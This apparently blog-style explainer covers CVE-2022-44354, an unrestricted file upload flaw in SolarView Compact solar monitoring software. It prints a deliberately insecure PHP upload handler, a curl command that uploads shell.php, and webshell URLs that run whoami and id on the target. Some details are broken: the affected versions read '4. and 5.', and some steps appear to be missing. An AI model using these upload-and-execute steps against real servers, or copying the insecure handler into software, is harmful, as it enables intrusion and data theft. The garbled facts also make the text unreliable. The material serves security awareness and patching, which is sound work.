SolarView Compact is a popular solar power monitoring platform, often found in smart buildings and renewable installations. In 2022, a dangerous vulnerability (CVE-2022-44354) came to light: Unrestricted File Upload in versions 4. and 5.. This bug lets an attacker upload any files—including malicious PHP scripts—directly onto the server. If you’re a system admin, a pentester, or just curious about web security, you need to know how this works and how to protect yourself.
What is CVE-2022-44354?
CVE-2022-44354 is classified as an “Unrestricted File Upload” vulnerability. This means there aren’t proper checks on what kind of files can be uploaded. If exploited, a hacker could upload a PHP file that contains malicious code. As soon as this file is executed on the server, the attacker could get full access—running commands, stealing sensitive data, or even pivoting to other internal systems.
Let’s dive into the code.
Suppose SolarView has an upload feature in their admin dashboard or a web form. Usually, secure upload handlers restrict uploads to safe file types (like .jpg, .png, etc.) and check file contents. In SolarView Compact 4. and 5., that didn’t happen.
Here’s a simplified PHP upload handler that’s vulnerable
<?php
if(isset($_FILES['uploadedfile'])){
$upload_dir = "uploads/";
$target_file = $upload_dir . basename($_FILES['uploadedfile']['name']);
if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_file)){
echo "File uploaded!";
} else {
echo "Upload failed!";
}
}
?>
See the problem? There’s *no check* to filter dangerous file types or check file contents.
Upload the Malicious File
Use the vulnerable form to upload shell.php. The server puts it in the web-accessible uploads/ directory.
Access your webshell by browsing to:
http://target-server/uploads/shell.php?cmd=whoami
Let’s see a live request using curl
curl -F 'uploadedfile=@shell.php' http://target-server/upload.php
After uploading, visit
http://target-server/uploads/shell.php?cmd=id
If you see the result of the id command, the server is compromised.
Data theft: Sensitive logs, credentials, or keys exposed.
- Pivoting: Attackers could use this entry point to compromise other devices or systems in your network.
How to Fix
Patch your SolarView Compact system! The vendor has been notified. As of this writing, check for updates at SolarView’s Official Site or review JPCert’s Vulnerability Note.
References & Links
- CVE-2022-44354 at NVD
- JPCert Advisory
- Exploit Details at Packet Storm
- SolarView Compact Vendor Site
- Understanding Unrestricted File Uploads (OWASP)
Final Thoughts
Unrestricted file upload bugs like CVE-2022-44354 are one of the easiest ways for bad actors to break into critical systems. If you’re running SolarView Compact, update as soon as possible and always verify what files are making it onto your server. Don’t wait until an intruder turns out the lights!
Stay safe, patch often, and audit your web applications!
Timeline
Published on: 11/29/2022 17:15:00 UTC
Last modified on: 12/01/2022 20:01:00 UTC